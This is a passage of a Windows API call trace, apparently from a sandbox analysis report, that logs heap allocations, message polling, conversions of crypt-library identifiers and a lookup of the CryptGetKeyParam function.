dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0100.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0100.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0100.489] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0100.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0100.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0100.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c40 [0100.489] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0100.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c40 | out: hHeap=0x1780000) returned 1 [0100.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0100.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0100.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2720 [0100.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0100.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0100.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0100.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0100.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x400f) returned 0x4516010 [0100.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0100.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2600 [0100.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0100.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0100.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0100.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2550 [0100.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0100.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0100.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0100.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2590 [0100.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0100.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0100.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0100.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3b8 [0100.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0100.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0100.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0100.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0100.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0100.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x400f) returned 0x451e040 [0100.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0100.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0100.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0100.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0100.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0100.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0100.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0100.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0100.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0100.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0100.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0100.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0100.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0100.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0100.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0100.491] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0100.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0100.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0100.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0100.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0100.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0100.491] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0100.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0100.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0100.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0100.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0100.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0100.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0100.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0100.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0100.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0100.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0100.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0100.491] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0100.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0100.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0100.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0100.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2660 [0100.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0100.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0100.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0100.492] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0100.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca250 [0100.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0100.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0100.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0100.492] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0100.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0100.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0100.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0100.492] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0100.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0100.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0100.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0100.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0100.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0100.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0100.492] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0100.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0100.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0100.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0100.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0100.492] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0100.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0100.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0100.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0100.492] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0100.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2668 [0100.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0100.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0100.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0100.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0100.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0100.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0100.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0100.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0100.493] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0100.493] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0100.493] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0100.493] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0100.493] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0100.493] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0100.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0100.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0100.493] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0100.493] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0100.493] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0100.493] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0100.493] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0100.493] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0100.493] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0100.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0100.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0100.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0100.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0100.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0100.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0100.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0100.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0100.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0100.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0100.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0100.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0100.494] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0100.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0100.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0100.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca598 [0100.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0100.494] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0100.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0100.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0100.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0100.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0100.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0100.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0100.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0100.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0100.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0100.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0100.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0100.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0100.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0100.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0100.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0100.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0100.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0100.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0100.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0100.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0100.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0100.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0100.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0100.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0100.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0100.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0100.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0100.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0100.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0100.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0100.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0100.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0100.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0100.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0100.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0100.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0100.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0100.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797028 [0100.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0100.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0100.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0100.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0100.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0100.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0100.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0100.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0100.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0100.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0100.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0100.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0100.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0100.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ea8 [0100.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0100.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0100.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0100.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0100.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0100.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0100.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0100.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0100.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0100.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0100.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0100.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0100.497] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0100.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0100.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0100.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0100.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0100.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0100.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0100.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0100.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0100.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0100.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0100.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0100.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0100.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0100.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0100.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0100.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0100.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0100.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0100.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0100.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0100.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0100.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0100.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0100.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0100.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797048, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0100.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0100.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0100.498] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0100.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0100.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0100.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0100.498] 